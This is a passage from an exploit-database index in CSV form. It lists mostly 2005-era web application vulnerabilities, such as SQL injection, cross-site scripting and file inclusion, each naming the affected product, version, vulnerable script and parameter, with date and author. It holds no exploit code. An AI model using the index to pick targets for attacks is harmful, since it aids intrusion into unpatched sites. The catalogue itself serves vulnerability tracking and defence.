Multiple SQL Injections",2005-04-20,Dcrab,asp,webapps, -25481,exploits/asp/webapps/25481.txt,"DUportal Pro 3.4 - 'detail.asp' Multiple SQL Injections",2005-04-20,Dcrab,asp,webapps, -25482,exploits/asp/webapps/25482.txt,"DUportal 3.1.2 - 'channel.asp?iChannel' SQL Injection",2005-04-20,Dcrab,asp,webapps, -25483,exploits/asp/webapps/25483.txt,"DUportal 3.1.2 - 'inc_poll_voting.asp?DAT_PARENT' SQL Injection",2005-04-20,Dcrab,asp,webapps, -25485,exploits/asp/webapps/25485.txt,"DUportal 3.1.2 - 'type.asp?iCat' SQL Injection",2005-04-20,Dcrab,asp,webapps, -25484,exploits/asp/webapps/25484.txt,"DUportal 3.1.2 - 'inc_rating.asp' Multiple SQL Injections",2005-04-20,Dcrab,asp,webapps, -25488,exploits/php/webapps/25488.txt,"ProfitCode Software PayProCart 3.0 - 'Username' Cross-Site Scripting",2005-04-21,Lostmon,php,webapps, -25489,exploits/php/webapps/25489.txt,"ProfitCode Software PayProCart 3.0 - Ckprvd Cross-Site Scripting",2005-04-21,Lostmon,php,webapps, -25490,exploits/php/webapps/25490.txt,"ProfitCode Software PayProCart 3.0 - AdminShop HDoc Cross-Site Scripting",2005-04-21,Lostmon,php,webapps, -25491,exploits/php/webapps/25491.txt,"ProfitCode Software PayProCart 3.0 - AdminShop ModID Cross-Site Scripting",2005-04-21,Lostmon,php,webapps, -25492,exploits/php/webapps/25492.txt,"ProfitCode Software PayProCart 3.0 - AdminShop TaskID Cross-Site Scripting",2004-04-21,Lostmon,php,webapps, -25493,exploits/php/webapps/25493.txt,"Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting",2013-05-17,r0ng,php,webapps, -25494,exploits/php/webapps/25494.txt,"ProfitCode Software PayProCart 3.0 - AdminShop ProMod Cross-Site Scripting",2005-04-21,Lostmon,php,webapps, -25495,exploits/php/webapps/25495.txt,"ProfitCode Software PayProCart 3.0 - AdminShop MMActionComm Cross-Site Scripting",2005-04-21,Lostmon,php,webapps, -25496,exploits/php/webapps/25496.txt,"PHP-Charts 1.0 - Code Execution",2013-05-17,"fizzle stick",php,webapps, -25498,exploits/asp/webapps/25498.txt,"ASPNuke 0.80 - 'Comments.asp' SQL Injection",2005-04-22,Dcrab,asp,webapps, -25500,exploits/asp/webapps/25500.txt,"ASPNuke 0.80 - 'detail.asp' SQL Injection",2005-04-22,Dcrab,asp,webapps, -25501,exploits/asp/webapps/25501.txt,"ASPNuke 0.80 - 'profile.asp' Cross-Site Scripting",2005-04-22,Dcrab,asp,webapps, -25502,exploits/asp/webapps/25502.txt,"ASPNuke 0.80 - 'Select.asp' Cross-Site Scripting",2005-04-22,Dcrab,asp,webapps, -25503,exploits/php/webapps/25503.txt,"WoltLab Burning Board 2.3.1 - 'thread.php' Cross-Site Scripting",2005-04-22,deluxe89,php,webapps, -25504,exploits/asp/webapps/25504.txt,"Black Knight Forum 4.0 - 'Member.asp' SQL Injection",2005-04-23,Dcrab,asp,webapps, -25505,exploits/asp/webapps/25505.txt,"Black Knight Forum 4.0 - 'forum.asp' SQL Injection",2005-04-23,Dcrab,asp,webapps, -25506,exploits/asp/webapps/25506.txt,"CartWIZ 1.10 - 'AddToCart.asp' SQL Injection",2005-04-23,Dcrab,asp,webapps, -25507,exploits/asp/webapps/25507.txt,"CartWIZ 1.10 - 'ProductCatalogSubCats.asp' SQL Injection",2005-04-23,Dcrab,asp,webapps, -25508,exploits/asp/webapps/25508.txt,"CartWIZ 1.10 - 'ProductDetails.asp' SQL Injection",2005-04-23,Dcrab,asp,webapps, -25509,exploits/asp/webapps/25509.txt,"CartWIZ 1.10 - 'searchresults.asp' PriceTo Argument SQL Injection",2005-04-23,Dcrab,asp,webapps, -25510,exploits/asp/webapps/25510.txt,"CartWIZ 1.10 - 'searchresults.asp' PriceFrom Argument SQL Injection",2005-04-23,Dcrab,asp,webapps, -40395,exploits/php/webapps/40395.txt,"Kajona 4.7 - Cross-Site Scripting / Directory Traversal",2016-09-19,"Curesec Research Team",php,webapps,80 -25511,exploits/asp/webapps/25511.txt,"CartWIZ 1.10 - 'searchresults.asp' idcategory Argument SQL Injection",2005-04-23,Dcrab,asp,webapps, -25512,exploits/asp/webapps/25512.txt,"CartWIZ 1.10 - 'TellAFriend.asp' Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps, -25513,exploits/asp/webapps/25513.txt,"CartWIZ 1.10 - 'AddToWishlist.asp' Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps, -25514,exploits/asp/webapps/25514.txt,"CartWIZ 1.10 - 'Access.asp' Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps, -25515,exploits/asp/webapps/25515.txt,"CartWIZ 1.10 - 'error.asp' Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps, -25516,exploits/asp/webapps/25516.txt,"CartWIZ 1.10 - 'login.asp' Redirect Argument Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps, -25518,exploits/php/webapps/25518.txt,"Exponent CMS 2.2.0 Beta 3 - Multiple Vulnerabilities",2013-05-17,"High-Tech Bridge SA",php,webapps, -25519,exploits/php/webapps/25519.txt,"ZPanel - 'templateparser.class.php' Crafted Template Remote Command Execution",2013-04-16,"Sven Slootweg",php,webapps, -25520,exploits/asp/webapps/25520.txt,"CartWIZ 1.10 - 'login.asp' Message Argument Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps, -25521,exploits/asp/webapps/25521.txt,"CartWIZ 1.10 - 'searchresults.asp' SKU Argument Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps, -25522,exploits/asp/webapps/25522.txt,"CartWIZ 1.10 - 'searchresults.asp' Name Argument Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps, -25523,exploits/php/webapps/25523.txt,"phpBB 2.0.x - 'profile.php' Cross-Site Scripting",2005-04-23,HaCkZaTaN,php,webapps, -25524,exploits/php/webapps/25524.txt,"phpBB 2.0.x - 'viewtopic.php' Cross-Site Scripting",2005-04-23,HaCkZaTaN,php,webapps, -25528,exploits/php/webapps/25528.txt,"WoltLab Burning Board 2.3.1 - 'PMS.php' Cross-Site Scripting",2005-04-25,deluxe89,php,webapps, -25529,exploits/asp/webapps/25529.txt,"StorePortal 2.63 - 'default.asp' Multiple SQL Injections",2005-04-25,Dcrab,asp,webapps, -25530,exploits/asp/webapps/25530.txt,"OneWorldStore - IDOrder Information Disclosure",2005-04-25,Lostmon,asp,webapps, -25531,exploits/php/webapps/25531.html,"PHPMyVisites 1.3 - 'Set_Lang' File Inclusion",2005-04-26,"Max Cerny",php,webapps, -25532,exploits/php/webapps/25532.txt,"Yappa-ng 1.x/2.x - Remote File Inclusion",2005-04-24,"James Bercegay",php,webapps, -25533,exploits/php/webapps/25533.txt,"Yappa-ng 1.x/2.x - Cross-Site Scripting",2005-04-24,"James Bercegay",php,webapps, -25534,exploits/php/webapps/25534.txt,"SqWebMail 3.x/4.0 - HTTP Response Splitting",2005-04-15,Zinho,php,webapps, -25535,exploits/php/webapps/25535.txt,"Invision Power Board 2.0.1 - 'QPid' SQL Injection",2005-04-26,SVT,php,webapps, -25536,exploits/asp/webapps/25536.txt,"MetaCart E-Shop V-8 - 'IntProdID' SQL Injection",2005-04-26,Dcrab,asp,webapps, -25537,exploits/asp/webapps/25537.txt,"MetaCart E-Shop V-8 - 'StrCatalog_NAME' SQL Injection",2005-04-26,Dcrab,asp,webapps, -25538,exploits/php/webapps/25538.txt,"GrayCMS 1.1 - 'error.php' Remote File Inclusion",2005-04-26,Kold,php,webapps, -25539,exploits/asp/webapps/25539.txt,"MetaCart2 - 'IntCatalogID' SQL Injection",2005-04-26,Dcrab,asp,webapps, -25540,exploits/asp/webapps/25540.txt,"MetaCart2 - 'StrSubCatalogID' SQL Injection",2005-04-26,Dcrab,asp,webapps, -25541,exploits/asp/webapps/25541.txt,"MetaCart2 - 'CurCatalogID' SQL Injection",2005-04-26,Dcrab,asp,webapps, -25542,exploits/asp/webapps/25542.txt,"MetaCart2 - 'strSubCatalog_NAME' SQL Injection",2005-04-26,Dcrab,asp,webapps, -25543,exploits/asp/webapps/25543.txt,"MetaCart2 - 'SearchAction.asp' Multiple SQL Injections",2005-04-26,Dcrab,asp,webapps, -25544,exploits/asp/webapps/25544.txt,"MetaBid Auctions - 'intAuctionID' SQL Injection",2005-04-26,Dcrab,asp,webapps, -25545,exploits/php/webapps/25545.txt,"BBlog 0.7.4 - 'PostID' SQL Injection",2004-04-26,jericho+bblog@attrition.org,php,webapps, -25548,exploits/php/webapps/25548.txt,"PHPCart - Input Validation",2005-04-27,Lostmon,php,webapps, -25549,exploits/php/webapps/25549.txt,"Claroline 1.5/1.6 - 'toolaccess_details.php?tool' Cross-Site Scripting",2005-04-27,"Sieg Fried",php,webapps, -25550,exploits/php/webapps/25550.txt,"Claroline 1.5/1.6 - 'user_access_details.php?data' Cross-Site Scripting",2005-04-27,"Sieg Fried",php,webapps, -25551,exploits/php/webapps/25551.txt,"Claroline 1.5/1.6 - 'myagenda.php?coursePath' Cross-Site Scripting",2005-04-27,"Sieg Fried",php,webapps, -25552,exploits/php/webapps/25552.txt,"Claroline E-Learning 1.5/1.6 - 'userInfo.php' Multiple SQL Injections",2005-04-27,"Sieg Fried",php,webapps, -25553,exploits/php/webapps/25553.txt,"Claroline E-Learning 1.5/1.6 - 'exercises_details.php?exo_id' SQL Injection",2005-04-27,"Sieg Fried",php,webapps, -25555,exploits/php/webapps/25555.txt,"Dream4 Koobi CMS 4.2.3 - 'index.php?P' SQL Injection",2005-04-27,"CENSORED Search Vulnerabilities",php,webapps, -25556,exploits/php/webapps/25556.txt,"Dream4 Koobi CMS 4.2.3 - 'index.php?Q' SQL Injection",2005-04-27,"CENSORED Search Vulnerabilities",php,webapps, -25558,exploits/php/webapps/25558.txt,"Notes Module for phpBB - SQL Injection",2005-04-28,"James Bercegay",php,webapps, -25560,exploits/php/webapps/25560.txt,"Just William's Amazon Webstore - 'Closeup.php?Image' Cross-Site Scripting",2005-04-28,Lostmon,php,webapps, -25564,exploits/php/webapps/25564.txt,"Just William's Amazon Webstore - 'CurrentIsExpanded' Cross-Site Scripting",2005-04-28,Lostmon,php,webapps, -25565,exploits/php/webapps/25565.txt,"Just William's Amazon Webstore - 'searchFor' Cross-Site Scripting",2005-04-28,Lostmon,php,webapps, -25566,exploits/php/webapps/25566.txt,"Just William's Amazon Webstore - 'CurrentNumber' Cross-Site Scripting",2005-04-28,Lostmon,php,webapps, -25567,exploits/php/webapps/25567.txt,"Just William's Amazon Webstore - HTTP Response Splitting",2005-04-28,Lostmon,php,webapps, -25568,exploits/php/webapps/25568.txt,"phpCOIN 1.2 - 'login.php?PHPcoinsessid' SQL Injection",2005-04-28,Dcrab,php,webapps, -25569,exploits/php/webapps/25569.txt,"phpCOIN 1.2 Pages Module - Multiple SQL Injections",2005-04-28,Dcrab,php,webapps, -25570,exploits/php/webapps/25570.txt,"JGS-Portal 3.0.1 - 'ID' SQL Injection",2005-04-30,admin@batznet.com,php,webapps, -25575,exploits/php/webapps/25575.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - 'basket.php' Multiple Cross-Site Scripting Vulnerabilities",2005-05-02,Lostmon,php,webapps, -25576,exploits/php/webapps/25576.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - 'page.php?page' Cross-Site Scripting",2005-05-02,Lostmon,php,webapps, -25577,exploits/php/webapps/25577.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - 'reviews.php' Multiple Cross-Site Scripting Vulnerabilities",2005-05-02,Lostmon,php,webapps, -25578,exploits/php/webapps/25578.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - 'product_details.php?category_id' Cross-Site Scripting",2005-05-02,Lostmon,php,webapps, -25579,exploits/php/webapps/25579.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - 'products.php' Multiple Cross-Site Scripting Vulnerabilities",2005-05-02,Lostmon,php,webapps, -25580,exploits/php/webapps/25580.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 - 'news_view.php' Multiple Cross-Site Scripting Vulnerabilities",2005-05-02,Lostmon,php,webapps, -25720,exploits/php/webapps/25720.txt,"Vanilla Forums 2.0.18.8 - Multiple Vulnerabilities",2013-05-26,"Henry Hoggard",php,webapps, -25585,exploits/asp/webapps/25585.txt,"Maxwebportal 1.3 - 'dl_popular.asp' SQL Injection",2005-05-02,s-dalili,asp,webapps, -25586,exploits/asp/webapps/25586.txt,"Maxwebportal 1.3 - 'links_popular.asp' SQL Injection",2005-05-02,s-dalili,asp,webapps, -25587,exploits/asp/webapps/25587.txt,"Maxwebportal 1.3 - 'pic_popular.asp' SQL Injection",2005-05-02,s-dalili,asp,webapps, -25588,exploits/asp/webapps/25588.txt,"Maxwebportal 1.3 - 'dl_toprated.asp' SQL Injection",2005-05-02,s-dalili,asp,webapps, -25589,exploits/asp/webapps/25589.txt,"Maxwebportal 1.3 - 'custom_link.asp' Multiple SQL Injections",2005-05-02,s-dalili,asp,webapps, -25590,exploits/php/webapps/25590.txt,"osTicket 1.2/1.3 - Multiple Input Validation / Remote Code Injection Vulnerabilities",2005-05-03,"James Bercegay",php,webapps, -25591,exploits/php/webapps/25591.txt,"SitePanel2 2.6.1 - Multiple Input Validation Vulnerabilities",2005-05-03,"James Bercegay",php,webapps, -25592,exploits/cgi/webapps/25592.txt,"WebCrossing WebX 5.0 - Cross-Site Scripting",2005-05-03,dr_insane,cgi,webapps, -25593,exploits/php/webapps/25593.txt,"Invision Power Board 2.0.3/2.1 - 'Act' Cross-Site Scripting",2005-05-03,"arron ward",php,webapps, -25594,exploits/cgi/webapps/25594.txt,"Gossamer Threads Links 2.x - 'User.cgi' Cross-Site Scripting",2005-05-04,"Nathan House",cgi,webapps, -25595,exploits/asp/webapps/25595.txt,"ASP Inline Corporate Calendar 3.6.3 - 'Defer.asp' SQL Injection",2005-05-04,Zinho,asp,webapps, -25596,exploits/asp/webapps/25596.txt,"ASP Inline Corporate Calendar 3.6.3 - 'Details.asp' SQL Injection",2005-05-04,Zinho,asp,webapps, -25599,exploits/php/webapps/25599.txt,"Interspire articlelive 2005 - Multiple Vulnerabilities",2005-05-04,Dcrab,php,webapps, -25601,exploits/php/webapps/25601.txt,"FishCart 3.1 - 'display.php?nlst' Cross-Site Scripting",2005-05-04,Dcrab,php,webapps, -25602,exploits/php/webapps/25602.txt,"FishCart 3.1 - 'upstracking.php' Multiple Cross-Site Scripting Vulnerabilities",2005-05-04,Dcrab,php,webapps, -25603,exploits/php/webapps/25603.txt,"FishCart 3.1 - 'display.php?psku' SQL Injection",2005-05-04,Dcrab,php,webapps, -25604,exploits/php/webapps/25604.txt,"FishCart 3.1 - 'upstnt.php?cartid' SQL Injection",2005-05-04,Dcrab,php,webapps, -25605,exploits/php/webapps/25605.txt,"WordPress Plugin ProPlayer 4.7.9.1 - SQL Injection",2013-05-21,"Ashiyane Digital Security Team",php,webapps, -25606,exploits/php/webapps/25606.py,"Kimai 0.9.2.1306-3 - SQL Injection",2013-05-21,drone,php,webapps, -30092,exploits/php/webapps/30092.txt,"FlashChat F_CMS 4.7.9 - Multiple Remote File Inclusions",2007-05-28,"Hasadya Raed",php,webapps, -25821,exploits/php/webapps/25821.txt,"Annuaire 1Two 1.0/1.1 - 'index.php' Cross-Site Scripting",2005-06-14,An0nym0uS,php,webapps, -25823,exploits/php/webapps/25823.txt,"McGallery 1.0/1.1 - Lang Argument File Disclosure",2005-06-15,D_BuG,php,webapps, -25824,exploits/php/webapps/25824.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 - Multiple Input Validation Vulnerabilities",2005-06-15,"GulfTech Security",php,webapps, -25825,exploits/php/webapps/25825.txt,"Ultimate PHP Board 1.8/1.9 - Multiple Cross-Site Scripting Vulnerabilities",2005-06-16,"Alberto Trivero",php,webapps, -25612,exploits/php/webapps/25612.txt,"MyBloggie 2.1 - 'index.php' Cross-Site Scripting",2005-05-05,"Alberto Trivero",php,webapps, -25614,exploits/php/webapps/25614.txt,"MidiCart PHP - 'Search_List.php?SearchString' SQL Injection",2005-05-05,Exoduks,php,webapps, -25615,exploits/php/webapps/25615.txt,"MidiCart PHP - 'Item_List.php?MainGroup' SQL Injection",2005-05-05,Exoduks,php,webapps, -25616,exploits/php/webapps/25616.txt,"MidiCart PHP - 'Item_List.php?SecondGroup' SQL Injection",2005-05-05,Exoduks,php,webapps, -25617,exploits/php/webapps/25617.txt,"MidiCart PHP - 'Item_Show.php?Code_No' SQL Injection",2005-05-05,Exoduks,php,webapps, -25618,exploits/php/webapps/25618.txt,"MidiCart PHP - 'Search_List.php?SearchString' Cross-Site Scripting",2005-05-05,Exoduks,php,webapps, -25619,exploits/php/webapps/25619.txt,"MidiCart PHP - 'Item_List.php?SecondGroup' Cross-Site Scripting",2005-05-05,Exoduks,php,webapps, -25620,exploits/php/webapps/25620.txt,"MidiCart PHP - 'Item_List.php?MainGroup' Cross-Site Scripting",2005-05-05,Exoduks,php,webapps, -25622,exploits/cgi/webapps/25622.txt,"MegaBook 2.0/2.1 - 'Admin.cgi?EntryID' Cross-Site Scripting",2005-05-05,"Spy Hat",cgi,webapps, -25623,exploits/php/webapps/25623.txt,"CJ Ultra Plus 1.0.3/1.0.4 - 'OUT.php' SQL Injection",2005-05-06,Kold,php,webapps, -25628,exploits/jsp/webapps/25628.txt,"phpBB 2.0.x - 'BBCode.php' URL Tag",2005-05-09,Papados,jsp,webapps, -25630,exploits/php/webapps/25630.txt,"Advanced Guestbook 2.3.1/2.4 - 'index.php?Entry' SQL Injection",2005-05-09,"Spy Hat",php,webapps, -25632,exploits/cgi/webapps/25632.txt,"Easy Message Board - Directory Traversal",2005-05-09,"SoulBlack Group",cgi,webapps, -25634,exploits/cgi/webapps/25634.txt,"Easy Message Board - Remote Command Execution",2005-05-09,"SoulBlack Group",cgi,webapps, -25635,exploits/php/webapps/25635.txt,"PHP-Nuke 0-7 - Double Hex Encoded Input Validation",2005-05-09,fistfuxxer@gmx.de,php,webapps, -25637,exploits/php/webapps/25637.txt,"CodeThatShoppingCart 1.3.1 - 'catalog.php?id' Cross-Site Scripting",2005-05-09,Lostmon,php,webapps, -25638,exploits/php/webapps/25638.txt,"CodeThatShoppingCart 1.3.1 - 'catalog.php?id' SQL Injection",2005-05-09,Lostmon,php,webapps, -25639,exploits/php/webapps/25639.txt,"PWSPHP 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-05-09,"SecuBox fRoGGz",php,webapps, -25640,exploits/php/webapps/25640.txt,"PWSPHP 1.1/1.2 - 'Profil.php' SQL Injection",2005-05-09,"SecuBox fRoGGz",php,webapps, -25641,exploits/php/webapps/25641.txt,"WowBB 1.6 - 'View_User.php' SQL Injection",2005-05-10,Megasky,php,webapps, -25642,exploits/php/webapps/25642.txt,"NukeET 3.0/3.1 - Base64 Codigo Variable Cross-Site Scripting",2005-05-10,"Suko & Lostmon",php,webapps, -25644,exploits/php/webapps/25644.txt,"e107 Website System 0.617 - 'Request.php' Directory Traversal",2005-05-10,Heintz,php,webapps, -25645,exploits/php/webapps/25645.txt,"e107 Website System 0.617 - 'Forum_viewforum.php' SQL Injection",2005-05-10,Heintz,php,webapps, -25649,exploits/cgi/webapps/25649.txt,"showoff! digital media software 1.5.4 - Multiple Vulnerabilities",2011-05-11,dr_insane,cgi,webapps, -25650,exploits/php/webapps/25650.txt,"Open Solution Quick.Cart 0.3 - 'index.php' Cross-Site Scripting",2005-05-11,Lostmon,php,webapps, -25651,exploits/asp/webapps/25651.txt,"Maxwebportal 1.3x - 'post.asp' Multiple Cross-Site Scripting Vulnerabilities",2005-05-11,Zinho,asp,webapps, -25653,exploits/php/webapps/25653.txt,"DirectTopics 2 - 'topic.php' SQL Injection",2005-05-12,"Morinex Eneco",php,webapps, -25654,exploits/php/webapps/25654.txt,"Ultimate PHP Board 1.8/1.9 - 'viewforum.php' Cross-Site Scripting",2005-05-13,"Morinex Eneco",php,webapps, -25655,exploits/php/webapps/25655.txt,"Ultimate PHP Board 1.8/1.9 - 'viewforum.php' SQL Injection",2005-05-13,"Morinex Eneco",php,webapps, -25656,exploits/php/webapps/25656.txt,"OpenBB 1.0.8 - 'Read.php' SQL Injection",2005-05-13,Megasky,php,webapps, -25657,exploits/php/webapps/25657.txt,"OpenBB 1.0.8 - 'member.php' Cross-Site Scripting",2005-05-13,Megasky,php,webapps, -25659,exploits/php/webapps/25659.txt,"PHPHeaven PHPMyChat 0.14.5 - 'Start-Page.CSS.php3' Cross-Site Scripting",2005-05-13,Megasky,php,webapps, -25660,exploits/php/webapps/25660.txt,"PHPHeaven PHPMyChat 0.14.5 - 'Style.CSS.php3' Cross-Site Scripting",2005-05-13,Megasky,php,webapps, -25661,exploits/asp/webapps/25661.txt,"Keyvan1 ImageGallery - Database Disclosure",2005-05-01,"g0rellazz G0r",asp,webapps, -25662,exploits/php/webapps/25662.txt,"Skull-Splitter Guestbook 1.0/2.0/2.2 - Multiple HTML Injection Vulnerabilities",2005-05-14,"Morinex Eneco",php,webapps, -25663,exploits/php/webapps/25663.txt,"Shop-Script - categoryId SQL Injection",2005-05-16,"CENSORED Search Vulnerabilities",php,webapps, -25664,exploits/php/webapps/25664.txt,"Shop-Script - ProductID SQL Injection",2005-05-16,"CENSORED Search Vulnerabilities",php,webapps, -25665,exploits/php/webapps/25665.txt,"PostNuke 0.75/0.76 Blocks Module - Directory Traversal",2005-05-16,pokley,php,webapps, -25666,exploits/cgi/webapps/25666.txt,"PServ 3.2 - Source Code Disclosure",2005-05-16,"Claus R. F. Overbeck",cgi,webapps, -25667,exploits/asp/webapps/25667.txt,"MetaCart E-Shop - 'ProductsByCategory.asp' Cross-Site Scripting",2005-05-16,"Dedi Dwianto",asp,webapps, -25668,exploits/cgi/webapps/25668.txt,"Sigma ISP Manager 6.6 - 'Sigmaweb.dll' SQL Injection",2005-05-16,"mehran gashtasebi",cgi,webapps, -25671,exploits/php/webapps/25671.txt,"NPDS 4.8/5.0 - 'comments.php?thold' SQL Injection",2005-05-16,NoSP,php,webapps, -25672,exploits/php/webapps/25672.txt,"NPDS 4.8/5.0 - 'pollcomments.php?thold' SQL Injection",2005-05-16,NoSP,php,webapps, -25673,exploits/php/webapps/25673.txt,"JGS-Portal 3.0.1/3.0.2 - 'jgs_portal_statistik.php?year' SQL Injection",2005-05-16,deluxe@security-project.org,php,webapps, -25674,exploits/php/webapps/25674.txt,"JGS-Portal 3.0.1/3.0.2 - 'jgs_portal.php?anzahl_beitraege' SQL Injection",2005-05-16,deluxe@security-project.org,php,webapps, -25675,exploits/php/webapps/25675.txt,"JGS-Portal 3.0.1/3.0.2 - 'jgs_portal_beitraggraf.php?year' SQL Injection",2005-05-16,deluxe@security-project.org,php,webapps, -25676,exploits/php/webapps/25676.txt,"JGS-Portal 3.0.1/3.0.2 - 'jgs_portal_viewsgraf.php?tag' SQL Injection",2005-05-16,deluxe@security-project.org,php,webapps, -25677,exploits/php/webapps/25677.txt,"JGS-Portal 3.0.1/3.0.2 - 'jgs_portal_themengraf.php?year' SQL Injection",2005-05-16,deluxe@security-project.org,php,webapps, -25678,exploits/php/webapps/25678.txt,"JGS-Portal 3.0.1/3.0.2 - 'jgs_portal_mitgraf.php?year' SQL Injection",2005-05-16,deluxe@security-project.org,php,webapps, -25679,exploits/php/webapps/25679.txt,"JGS-Portal 3.0.1/3.0.2 - 'jgs_portal_sponsor.php?id' SQL Injection",2005-05-16,deluxe@security-project.org,php,webapps, -25681,exploits/php/webapps/25681.php,"Fusionphp Fusion News 3.3/3.6 - X-Forworded-For PHP Script Code Injection",2005-05-24,"Network security team",php,webapps, -25682,exploits/php/webapps/25682.txt,"WordPress 1.5 - 'post.php' Cross-Site Scripting",2005-05-17,"Thomas Waldegger",php,webapps, -25683,exploits/php/webapps/25683.txt,"Help Center Live 1.0/1.2.x - Multiple Input Validation Vulnerabilities",2005-05-24,"GulfTech Security",php,webapps, -25685,exploits/jsp/webapps/25685.txt,"Sun JavaMail 1.3 - API MimeMessage Infromation Disclosure",2005-05-19,"Ricky Latt",jsp,webapps, -25686,exploits/php/webapps/25686.txt,"PHP Advanced Transfer Manager 1.21 - Arbitrary File Inclusion",2005-05-19,"Ingvar Gilbert",php,webapps, -25689,exploits/php/webapps/25689.txt,"EJ3 TOPo 2.2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2003-05-20,Lostmon,php,webapps, -25690,exploits/php/webapps/25690.pl,"PortailPHP 1.3 - 'ID' SQL Injection",2005-05-23,"CENSORED Search Vulnerabilities",php,webapps, -25693,exploits/php/webapps/25693.txt,"GForge 3.x - Arbitrary Command Execution",2005-05-24,"Filippo Spike Morelli",php,webapps, -25766,exploits/php/webapps/25766.txt,"Qualiteam X-Cart 4.0.8 - 'giftcert.php' Multiple Cross-Site Scripting Vulnerabilities",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps, -25700,exploits/asp/webapps/25700.txt,"Spread The Word - Multiple Cross-Site Scripting Vulnerabilities",2005-05-24,Lostmon,asp,webapps, -25701,exploits/asp/webapps/25701.txt,"Spread The Word - Multiple SQL Injections",2005-05-24,Lostmon,asp,webapps, -25702,exploits/java/webapps/25702.txt,"Sun JavaMail 1.x - Multiple Information Disclosure Vulnerabilities",2005-05-24,"Ricky Latt",java,webapps, -25704,exploits/php/webapps/25704.txt,"PHP Poll Creator 1.0.1 - 'Poll_Vote.php' Remote File Inclusion",2005-05-25,"rash ilusion",php,webapps, -25705,exploits/asp/webapps/25705.txt,"FunkyASP AD Systems 1.1 - 'login.asp' SQL Injection",2005-05-25,Romty,asp,webapps, -25715,exploits/hardware/webapps/25715.py,"HP LaserJet Pro P1606dn - Webadmin Password Reset",2013-05-26,m3tamantra,hardware,webapps, -25716,exploits/php/webapps/25716.py,"AVE.CMS 2.09 - 'index.php?module' Blind SQL Injection",2013-05-26,mr.pr0n,php,webapps, -25721,exploits/php/webapps/25721.txt,"WordPress Plugin User Role Editor 3.12 - Cross-Site Request Forgery",2013-05-26,"Henry Hoggard",php,webapps, -25723,exploits/php/webapps/25723.txt,"WordPress Plugin Spider Event Calendar 1.3.0 - Multiple Vulnerabilities",2013-05-26,waraxe,php,webapps, -25724,exploits/php/webapps/25724.txt,"WordPress Plugin Spider Catalog 1.4.6 - Multiple Vulnerabilities",2013-05-26,waraxe,php,webapps, -25726,exploits/php/webapps/25726.txt,"RadioCMS 2.2 - 'menager.php?playlist_id' SQL Injection",2013-05-26,Rooster(XEKA),php,webapps, -25727,exploits/php/webapps/25727.txt,"BookReview 1.0 - 'add_review.htm' Multiple Cross-Site Scripting Vulnerabilities",2005-05-26,Lostmon,php,webapps, -25728,exploits/php/webapps/25728.txt,"BookReview 1.0 - 'add_contents.htm' Multiple Cross-Site Scripting Vulnerabilities",2005-05-26,Lostmon,php,webapps, -25729,exploits/php/webapps/25729.txt,"BookReview 1.0 - 'suggest_category.htm?node' Cross-Site Scripting",2005-05-26,Lostmon,php,webapps, -25730,exploits/php/webapps/25730.txt,"BookReview 1.0 - 'contact.htm?user' Cross-Site Scripting",2005-05-26,Lostmon,php,webapps, -25731,exploits/php/webapps/25731.txt,"BookReview 1.0 - 'add_booklist.htm?node' Cross-Site Scripting",2005-05-26,Lostmon,php,webapps, -25732,exploits/php/webapps/25732.txt,"BookReview 1.0 - 'add_url.htm?node' Cross-Site Scripting",2005-05-26,Lostmon,php,webapps, -25733,exploits/php/webapps/25733.txt,"BookReview 1.0 - 'search.htm?submit string' Cross-Site Scripting",2005-05-26,Lostmon,php,webapps, -25734,exploits/php/webapps/25734.txt,"BookReview 1.0 - 'add_classification.htm?isbn' Cross-Site Scripting",2005-05-26,Lostmon,php,webapps, -25735,exploits/php/webapps/25735.txt,"BookReview 1.0 - 'suggest_review.htm?node' Cross-Site Scripting",2005-05-26,Lostmon,php,webapps, -25738,exploits/jsp/webapps/25738.txt,"BEA WebLogic 7.0/8.1 - Administration Console LoginForm.jsp Cross-Site Scripting",2005-05-27,"Team SHATTER",jsp,webapps, -25739,exploits/jsp/webapps/25739.txt,"BEA WebLogic 7.0/8.1 - Administration Console Error Page Cross-Site Scripting",2005-05-27,"Team SHATTER",jsp,webapps, -25740,exploits/php/webapps/25740.txt,"Jaws Glossary 0.4/0.5 - Cross-Site Scripting",2005-05-27,Nah,php,webapps, -25741,exploits/php/webapps/25741.bat,"Invision Power Board 1.x - Unauthorized Access",2005-05-28,V[i]RuS,php,webapps, -25742,exploits/php/webapps/25742.txt,"NPDS 4.8 < 5.0 - 'admin.php?language' Cross-Site Scripting",2005-05-28,NoSP,php,webapps, -25743,exploits/php/webapps/25743.txt,"NPDS 4.8 < 5.0 - 'powerpack_f.php?language' Cross-Site Scripting",2005-05-28,NoSP,php,webapps, -25744,exploits/php/webapps/25744.txt,"NPDS 4.8 < 5.0 - 'sdv_infos.php?sitename' Cross-Site Scripting",2005-05-28,NoSP,php,webapps, -25745,exploits/php/webapps/25745.txt,"NPDS 4.8 /5.0 - 'modules.php?Lettre' Cross-Site Scripting",2005-05-28,NoSP,php,webapps, -25746,exploits/php/webapps/25746.txt,"NPDS 4.8 < 5.0 - 'reviews.php?title' Cross-Site Scripting",2005-05-28,NoSP,php,webapps, -25747,exploits/php/webapps/25747.txt,"NPDS 4.8 < 5.0 - 'reply.php?image_subject' Cross-Site Scripting",2005-05-28,NoSP,php,webapps, -25748,exploits/php/webapps/25748.txt,"NPDS 4.8 < 5.0 Glossaire Module - 'terme' SQL Injection",2005-05-28,NoSP,php,webapps, -25749,exploits/php/webapps/25749.txt,"NPDS 4.8 < 5.0 - 'links.php?Query' SQL 